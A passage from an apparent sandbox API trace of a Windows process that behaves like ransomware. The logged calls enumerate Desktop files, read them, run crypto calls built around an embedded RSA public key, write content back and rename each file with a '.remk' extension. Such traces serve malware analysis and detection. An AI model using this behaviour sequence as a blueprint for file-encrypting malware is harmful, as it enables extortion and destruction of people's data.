hHeap=0x630000, dwFlags=0x0, lpMem=0x325c7b8 | out: hHeap=0x630000) returned 1 [0234.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fd48 | out: hHeap=0x630000) returned 1 [0234.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3195950 | out: hHeap=0x630000) returned 1 [0234.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31b5808 | out: hHeap=0x630000) returned 1 [0234.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6b30 | out: hHeap=0x630000) returned 1 [0234.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f08 | out: hHeap=0x630000) returned 1 [0234.896] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0234.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0234.897] WriteFile (in: hFile=0x640, lpBuffer=0x37c4278*, nNumberOfBytesToWrite=0xef88, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37c4278*, lpNumberOfBytesWritten=0x3adfb14*=0xef88, lpOverlapped=0x0) returned 1 [0234.897] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c4278 | out: hHeap=0x630000) returned 1 [0234.897] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xef8d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.897] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0234.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0234.898] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0234.898] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0234.898] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0234.898] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37c0db8 [0234.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0234.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0234.898] WriteFile (in: hFile=0x640, lpBuffer=0x37c0db8*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37c0db8*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0234.898] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37c0db8 | out: hHeap=0x630000) returned 1 [0234.898] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0234.898] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0234.898] CloseHandle (hObject=0x640) returned 1 [0234.901] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc0) returned 0x31c7810 [0234.902] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d0) returned 0x325d3b0 [0234.902] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c7810 | out: hHeap=0x630000) returned 1 [0234.902] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\iIWj9EjHStmpO_L\\kIgwk9vBXkfQWoRq4O4.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\iiwj9ejhstmpo_l\\kigwk9vbxkfqworq4o4.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\iIWj9EjHStmpO_L\\kIgwk9vBXkfQWoRq4O4.swf.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\iiwj9ejhstmpo_l\\kigwk9vbxkfqworq4o4.swf.remk")) returned 1 [0234.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325d3b0 | out: hHeap=0x630000) returned 1 [0234.903] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.903] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0234.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31658e8 | out: hHeap=0x630000) returned 1 [0234.904] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcf1f7090, ftCreationTime.dwHighDateTime=0x1d5d838, ftLastAccessTime.dwLowDateTime=0x8512bac0, ftLastAccessTime.dwHighDateTime=0x1d5e08f, ftLastWriteTime.dwLowDateTime=0x8512bac0, ftLastWriteTime.dwHighDateTime=0x1d5e08f, nFileSizeHigh=0x0, nFileSizeLow=0xa7e7, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MR bG63x.gif", cAlternateFileName="MRBG63~1.GIF")) returned 1 [0234.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e860 [0234.904] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd6) returned 0x31658e8 [0234.904] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0234.904] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\iIWj9EjHStmpO_L\\MR bG63x.gif") returned=".gif" [0234.904] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\wzVrnoY3pfgm5\\iIWj9EjHStmpO_L\\MR bG63x.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\wzvrnoy3pfgm5\\iiwj9ejhstmpo_l\\mr bg63x.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0234.906] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=42983) returned 1 [0234.906] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0234.909] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xa7c1, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0234.909] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0234.911] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.911] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.911] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0234.911] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xa7e7, lpOverlapped=0x0) returned 1 [0234.912] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.912] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0234.912] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.912] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0234.912] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694ec0) returned 1 [0234.913] CryptCreateHash (in: hProv=0x694ec0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0234.913] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0234.913] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0234.913] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0234.913] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0234.913] GetLastError () returned 0x0 [0234.913] CryptDestroyHash (hHash=0x31de170) returned 1 [0234.914] CryptReleaseContext (hProv=0x694ec0, dwFlags=0x0) returned 1 [0234.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0234.914] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0234.914] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0234.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.914] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0234.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0234.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0234.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa7f0) returned 0x37c4278 [0234.914] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0234.914] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0234.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0234.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0234.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0234.914] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0234.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c7b8 [0234.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee910 [0234.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x325c800 [0234.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee928 [0234.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee958 [0234.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9b8 [0234.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee970 [0234.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0234.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0234.915] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0234.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0234.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee958 | out: hHeap=0x630000) returned 1 [0234.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee970 | out: hHeap=0x630000) returned 1 [0234.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9b8 | out: hHeap=0x630000) returned 1 [0234.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0234.915] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0234.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9b8 [0234.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0234.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee970 [0234.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0f28 [0234.915] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x31ee958 [0234.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0234.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0234.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0234.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0234.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0234.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0234.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0234.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0234.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0234.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee970 | out: hHeap=0x630000) returned 1 [0234.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee958 | out: hHeap=0x630000) returned 1 [0234.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0f28 | out: hHeap=0x630000) returned 1 [0234.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9b8 | out: hHeap=0x630000) returned 1 [0234.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0234.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6990 | out: hHeap=0x630000) returned 1 [0234.916] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0234.916] GetCurrentThreadId () returned 0x314 [0234.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0234.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c3c70 [0234.916] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0234.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694ec0 [0234.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0234.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0234.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3192918 [0234.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.917] GetCurrentThreadId () returned 0x314 [0234.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x65dd10 [0234.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0234.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0234.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0234.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0234.917] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0234.917] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0234.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x3195950 [0234.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9b8 [0234.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0234.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0234.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0234.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0234.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0234.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0234.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee958 [0234.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fec0 [0234.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0234.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0234.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0234.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0234.918] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee970 [0234.918] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0234.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0234.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0234.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee940 [0234.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0234.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9d0 [0234.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0234.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0234.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee9a0 [0234.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0234.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee988 [0234.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee9e8 [0234.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee988 | out: hHeap=0x630000) returned 1 [0234.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x31ee988 [0234.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9a0 | out: hHeap=0x630000) returned 1 [0234.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed28 [0234.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0234.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0234.919] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0234.919] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0234.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee958 | out: hHeap=0x630000) returned 1 [0234.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x31ee958 [0234.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fec0 | out: hHeap=0x630000) returned 1 [0234.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0234.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9b8 | out: hHeap=0x630000) returned 1 [0234.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6d60 [0234.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee9e8 | out: hHeap=0x630000) returned 1 [0234.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37c0db8 [0234.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0234.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x72aea0 [0234.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0234.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0234.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ee958 | out: hHeap=0x630000) returned 1 [0234.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37c0fd0 [0234.920] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6d60 | out: hHeap=0x630000) returned 1 [0234.920] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0234.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0234.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694ec0 | out: hHeap=0x630000) returned 1 [0234.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65dd10 | out: hHeap=0x630000) returned 1 [0234.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0234.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0234.921] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: 